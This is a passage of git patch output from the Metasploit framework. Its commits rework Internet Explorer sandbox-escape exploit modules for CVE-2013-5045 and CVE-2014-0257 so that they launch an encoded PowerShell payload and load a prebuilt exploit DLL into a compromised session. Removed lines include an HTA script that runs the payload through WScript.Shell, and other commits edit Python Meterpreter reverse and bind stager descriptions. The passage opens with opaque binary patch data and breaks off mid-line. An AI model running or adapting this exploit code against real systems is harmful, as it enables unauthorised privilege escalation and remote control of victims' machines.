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 Nxm<QlCp<{`|1W*%@xK57 diff --git a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp index 52d366faf8..162568212e 100755 --- a/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp +++ b/external/source/exploits/IE11SandboxEscapes/CVE-2013-5045/CVE-2013-5045.cpp @@ -112,8 +112,8 @@ void DoRegistrySymlink() throw 0; } - CreateRegistryValueString(hKey, L"AppName", L"mshta.exe"); - CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory()); + CreateRegistryValueString(hKey, L"AppName", L"powershell.exe"); + CreateRegistryValueString(hKey, L"AppPath", GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0"); CreateRegistryValueDword(hKey, L"Policy", 3); bstr_t name = GetSessionPath() + L"\\BaseNamedObjects\\LRIEElevationPolicy_"; @@ -156,7 +156,7 @@ void DoRegistrySymlink() CloseHandle(hSection); hSection = nullptr; - MyCreateProcess(GetWindowsSystemDirectory() + L"\\mshta.exe", L"mshta.exe " + GetExploitUrl(L"HTA_URL")); + MyCreateProcess(GetWindowsSystemDirectory() + L"\\WindowsPowerShell\\v1.0\\powershell.exe", L"powershell.exe " + GetExploitUrl(L"PSH_CMD")); } catch (...) { diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild deleted file mode 100755 index e2ca621d10..0000000000 --- a/external/source/exploits/IE11SandboxEscapes/make.msbuild +++ /dev/null @@ -1,18 +0,0 @@ -<?xml version="1.0" standalone="yes"?> -<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> - <PropertyGroup> - <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath> - </PropertyGroup> - - <Target Name="all" DependsOnTargets="x86" /> - - <Target Name="x86"> - <Message Text="Building IE11SandboxEscapes x86 Release version" /> - <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> - </Target> - - <Target Name="x64"> - <Message Text="IE11SandboxEscapes not supported in x64" /> - </Target> -</Project> - diff --git a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb index 457a90bb90..1cf3a6204c 100644 --- a/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb +++ b/modules/exploits/windows/local/ms13_097_ie_registry_symlink.rb @@ -74,13 +74,13 @@ class Metasploit3 < Msf::Exploit::Local rescue Timeout::Error end - session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", nil) + session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", nil) session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", nil) end def primer - hta_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" - session.railgun.kernel32.SetEnvironmentVariableA("HTA_URL", hta_uri) + cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + session.railgun.kernel32.SetEnvironmentVariableA("PSH_CMD", cmd) html_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.html" session.railgun.kernel32.SetEnvironmentVariableA("HTML_URL", html_uri) @@ -99,17 +99,7 @@ class Metasploit3 < Msf::Exploit::Local end def on_request_uri(cli, request) - if request.uri =~ /\.hta$/ - print_status("Sending hta...") - hta = <<-eos -<script> -var command = "#{cmd_psh_payload(payload.encoded).strip}"; -var shell = new ActiveXObject("WScript.Shell"); -shell.Run(command); -</script> - eos - send_response(cli, hta, {'Content-Type'=>'application/hta'}) - elsif request.uri =~ /\.html$/ + if request.uri =~ /\.html$/ print_status("Sending window close html...") close_html = <<-eos <html> From 98a06b3d72cae72ca6ce51be5d27451829860f7b Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:05:26 -0500 Subject: [PATCH 464/853] Restore make.msbuild --- .../exploits/IE11SandboxEscapes/make.msbuild | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild new file mode 100644 index 0000000000..e2ca621d10 --- /dev/null +++ b/external/source/exploits/IE11SandboxEscapes/make.msbuild @@ -0,0 +1,18 @@ +<?xml version="1.0" standalone="yes"?> +<Project xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> + <PropertyGroup> + <SolutionPath>.\IE11SandboxEscapes.sln</SolutionPath> + </PropertyGroup> + + <Target Name="all" DependsOnTargets="x86" /> + + <Target Name="x86"> + <Message Text="Building IE11SandboxEscapes x86 Release version" /> + <MSBuild Projects="$(SolutionPath)" Properties="Configuration=Release;Platform=Win32" Targets="Clean;Rebuild"/> + </Target> + + <Target Name="x64"> + <Message Text="IE11SandboxEscapes not supported in x64" /> + </Target> +</Project> + From 372a12b966183464485095d0cc5732b0cd8524d9 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:07:34 -0500 Subject: [PATCH 465/853] Restore make.msbuild permissions --- external/source/exploits/IE11SandboxEscapes/make.msbuild | 0 1 file changed, 0 insertions(+), 0 deletions(-) mode change 100644 => 100755 external/source/exploits/IE11SandboxEscapes/make.msbuild diff --git a/external/source/exploits/IE11SandboxEscapes/make.msbuild b/external/source/exploits/IE11SandboxEscapes/make.msbuild old mode 100644 new mode 100755 From 95376bf6d3384cfdbc71a732434f7b39d5988484 Mon Sep 17 00:00:00 2001 From: Spencer McIntyre <zeroSteiner@gmail.com> Date: Tue, 3 Jun 2014 10:17:27 -0400 Subject: [PATCH 466/853] Pymeterpreter update stager and stage descriptions --- modules/payloads/stagers/python/bind_tcp.rb | 2 +- modules/payloads/stagers/python/reverse_tcp.rb | 2 +- modules/payloads/stages/python/meterpreter.rb | 7 +++++-- 3 files changed, 7 insertions(+), 4 deletions(-) diff --git a/modules/payloads/stagers/python/bind_tcp.rb b/modules/payloads/stagers/python/bind_tcp.rb index 6886bce4f1..277afc3050 100644 --- a/modules/payloads/stagers/python/bind_tcp.rb +++ b/modules/payloads/stagers/python/bind_tcp.rb @@ -15,7 +15,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Python Bind TCP Stager', - 'Description' => 'Python connect stager', + 'Description' => 'Listen for a connection', 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'Platform' => 'python', diff --git a/modules/payloads/stagers/python/reverse_tcp.rb b/modules/payloads/stagers/python/reverse_tcp.rb index 2921f9011f..2608320d31 100644 --- a/modules/payloads/stagers/python/reverse_tcp.rb +++ b/modules/payloads/stagers/python/reverse_tcp.rb @@ -15,7 +15,7 @@ module Metasploit3 def initialize(info = {}) super(merge_info(info, 'Name' => 'Python Reverse TCP Stager', - 'Description' => 'Reverse Python connect back stager', + 'Description' => 'Connect back to the attacker', 'Author' => 'Spencer McIntyre', 'License' => MSF_LICENSE, 'Platform' => 'python', diff --git a/modules/payloads/stages/python/meterpreter.rb b/modules/payloads/stages/python/meterpreter.rb index 1862298b82..0f0118ae68 100644 --- a/modules/payloads/stages/python/meterpreter.rb +++ b/modules/payloads/stages/python/meterpreter.rb @@ -14,8 +14,11 @@ module Metasploit3 def initialize(info = {}) super(update_info(info, 'Name' => 'Python Meterpreter', - 'Description' => 'Run a meterpreter server in Python', - 'Author' => ['Spencer McIntyre'], + 'Description' => %q{ + Run a meterpreter server in Python. Supported Python versions + are 2.5 - 2.7 and 3.1 - 3.4. + }, + 'Author' => 'Spencer McIntyre', 'Platform' => 'python', 'Arch' => ARCH_PYTHON, 'License' => MSF_LICENSE, From 05ed2340dc18b39e448d1225738eb77dc460a966 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:29:04 -0500 Subject: [PATCH 467/853] Use powershell --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 108544 -> 108544 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 59 ++++++------------ 2 files changed, 19 insertions(+), 40 deletions(-) diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index cdfd0626b75c0d6fff30a5b9625536d432cbf51a..00a4f22ff675408e69861c6a5f7ca379a9016506 100755 GIT binary patch delta 466 zcmZp;z}9eqZNdlU^*4Gae%{O2uz4dRGc)6l$y-^b14&=j<v{W)YdzzO$)#-58E;JH zWj_WauduHIiq~^A0ohEPAwV*m(~9xN=1H6?OyV7ti~|2fBNQ10dR<Q(cm2Zv1OXW@ zHlOAG$H@3%^BLZHkOe-1-<en{H@gaLV`LQB{6|=jiSfr~KCynr$-H95n=gnTVieZ^ z8kD6F^kSX>14B1k^AUmgxWnNY0h3osDls-pJ|k%ZbS|e92df}Y6{Eo6GjOm&WU`X{ zJVuMn2jztrMJ<4mFD|h$Fl2yPCqS%#%`X&MnHU2m=PBzmCQP2ET*Ig^Sz2WoW69)0 zD%y+*o8PI}G6L<;Q40dvQLh&IR2~>W!62V70WpYiqKc8>L<%EFhyf_K{WCYCq%32> zc3w?JZdM>IsmCa+&BRf)T`!W+juFJji()L|5G`QHXDDY#Whi1OX2<~2IY7uT{bdqk zKMTmH?G?$4E{uwK1q>lUdVLPlV-q{~)<pG#>~Xe=3CJ%`Eh^4P&B>YmCWX;>yFw~s Vo;`bwWrO7&s{`AoE@8}O1_0UGowEP{ delta 464 zcmZp;z}9eqZNdlUpS>LuKksEM*u0UEnVIp$<gF~zfut|%av=GYwVv_D<Wjcjj3*}Z zvL6GISJ+np#p^kmfNUnt5Fi=OX~lSA^CV6cCh>|&MuGpL5sHigy{;#YyZ&JSf`E)0 zo6mCpV`RLs`3!G8Gvk}dK7!wwepGCB723wg$g%m4upraqx#Gr~9mHZmisp%bVHB4E z8kD6F^kSX>14B1k^AUmgxWnNYE|XVEDlwK!J|k(vShAT@ii1_~4^ZLZGjOnjWwMg| zJVuSp2jztrMK!7z1zucYV_?Vtvrd3m4x3*nv@$U|OwLo*XAGD;Pq~IsV6wEzGRBn2 zhg7r~12(@?v1J6>p`#WAw4+`v^r<{BfPz6jVFKbLAl^~M$gm@Y5hTO_l-vH9n^97h zF=0EeCL=d1ke1YA6xL??QMp|&lF^P4#K?<cEaKqIWhiFIU?^cooc=Y5v449<GNTKl z!O5A?sZV;uoi{93pOL1}4>X#A!PzRt)78*0I596JDZj$CI61K(wOBVdvA86)X!_d} bM&s@Bsf_vd>;;x3mTRmwY@fP>F`F3x3h$$( diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 55d028cd29..84a0ea81a3 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -13,7 +13,6 @@ class Metasploit3 < Msf::Exploit::Local include Msf::Exploit::Powershell include Msf::Exploit::EXE - include Msf::Exploit::Remote::HttpServer include Msf::Post::Windows::Priv include Msf::Post::Windows::FileInfo include Msf::Post::File @@ -47,12 +46,15 @@ class Metasploit3 < Msf::Exploit::Local ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], - 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'IE 8 - 11', { } ] ], 'DefaultTarget' => 0, + 'DefaultOptions' => + { + 'WfsDelay' => 30 + }, 'DisclosureDate'=> "Feb 11 2014", 'References' => [ @@ -153,12 +155,22 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") - begin - Timeout.timeout(datastore['DELAY']) { super } - rescue Timeout::Error - end + cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) - session.railgun.kernel32.SetEnvironmentVariableA("MYURL", nil) + temp = get_env('TEMP') + + print_status("Loading Exploit Library...") + + session.core.load_library( + 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), + 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", + 'UploadLibrary' => true, + 'Extension' => false, + 'SaveToDisk' => false + ) + + session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", nil) end def valid_mscorlib_version?(net_version, mscorlib_version) @@ -183,38 +195,5 @@ class Metasploit3 < Msf::Exploit::Local valid end - def primer - exploit_uri = "#{get_uri}/#{rand_text_alpha(4 + rand(4))}.hta" - session.railgun.kernel32.SetEnvironmentVariableA("MYURL", exploit_uri) - - temp = get_env('TEMP') - - print_status("Loading Exploit Library...") - - session.core.load_library( - 'LibraryFilePath' => ::File.join(Msf::Config.data_directory, "exploits", "CVE-2014-0257", "CVE-2014-0257.dll"), - 'TargetFilePath' => temp + "\\CVE-2014-0257.dll", - 'UploadLibrary' => true, - 'Extension' => false, - 'SaveToDisk' => false - ) - end - - def on_request_uri(cli, request) - if request.uri =~ /\.hta$/ - print_status("Sending hta...") - hta = <<-eos -<script> -var command = "#{cmd_psh_payload(payload.encoded).strip}"; -var shell = new ActiveXObject("WScript.Shell"); -shell.Run(command); -</script> - eos - send_response(cli, hta, {'Content-Type'=>'application/hta'}) - else - send_not_found(cli) - end - end - end From b8a2cf776bba370cd14a58e4ea4713a10ef03598 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:48:40 -0500 Subject: [PATCH 468/853] Do test --- data/exploits/CVE-2014-0257/CVE-2014-0257.dll | Bin 108544 -> 108544 bytes .../windows/local/ms14_009_ie_dfsvc.rb | 6 +----- 2 files changed, 1 insertion(+), 5 deletions(-) diff --git a/data/exploits/CVE-2014-0257/CVE-2014-0257.dll b/data/exploits/CVE-2014-0257/CVE-2014-0257.dll index 00a4f22ff675408e69861c6a5f7ca379a9016506..880dab912727a4a55be841ee2cf433338466f02d 100755 GIT binary patch delta 178 zcmZp;z}9eqZNdkpZ}&ES3KV4I*z6*-osm&u^B>`9tl~PAi~?B-K`-VBFfeqpH6Ia( zk2@Tm5i)tDq!MGx<TH{sj4hivrIdJp938bFAg5j}^r_spd%eL7K)?jVAjXL*Murn9 zj36O~Z}+x;;$~zE=M4Z#c`!IL_%gUKFidAmW^CTxk<94AC=j{#`47wQvppy5F3f5C YG__&-ofO7R_RI~IE!!t9Va#U+07slX4*&oF delta 179 zcmZp;z}9eqZNdkp^*1(t3KV2y+3X^;osm&w^B>`9tl}D#i~?B-K`-VBFfeqpH6Ia( zk2@Tm5iohBq!MGp<TH{sj18MPrIdJp938bFAg5j}^r_tX8@<5{K)?jVAjXL*Murn9 zj36O~^*6SE;$~zE=k#TWWC&#lV(^*Hn#|bD0+QR_k<94AD3Djc5E7)<=P*4sv2$-t XRR8unDU6%!nQJT?wohEbn9mFVrwTZw diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 84a0ea81a3..88f1f19176 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -64,11 +64,6 @@ class Metasploit3 < Msf::Exploit::Local ['URL', 'https://github.com/tyranid/IE11SandboxEscapes'] ] )) - - register_options( - [ - OptInt.new('DELAY', [true, 'Time that the HTTP Server will wait for the payload request', 10]) - ]) end def check @@ -156,6 +151,7 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip + print_status cmd session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP') From 43699b1dfb363e60a312dd7b3c2edfadbc0ffe99 Mon Sep 17 00:00:00 2001 From: jvazquez-r7 <juan_vazquez@rapid7.com> Date: Tue, 3 Jun 2014 09:56:19 -0500 Subject: [PATCH 469/853] Don't clean env variable before using it --- modules/exploits/windows/local/ms14_009_ie_dfsvc.rb | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb index 88f1f19176..3c643ef678 100644 --- a/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb +++ b/modules/exploits/windows/local/ms14_009_ie_dfsvc.rb @@ -151,7 +151,6 @@ class Metasploit3 < Msf::Exploit::Local print_good(".NET looks vulnerable, exploiting...") cmd = cmd_psh_payload(payload.encoded).gsub('%COMSPEC% /B /C start powershell.exe ','').strip - print_status cmd session.railgun.kernel32.SetEnvironmentVariableA("PSHCMD", cmd) temp = get_env('TEMP') @@ -165,8 +164,6 @@ class Metasploit3 < Msf::Exploit::Local 'Extension' => false, 'SaveToDisk' => 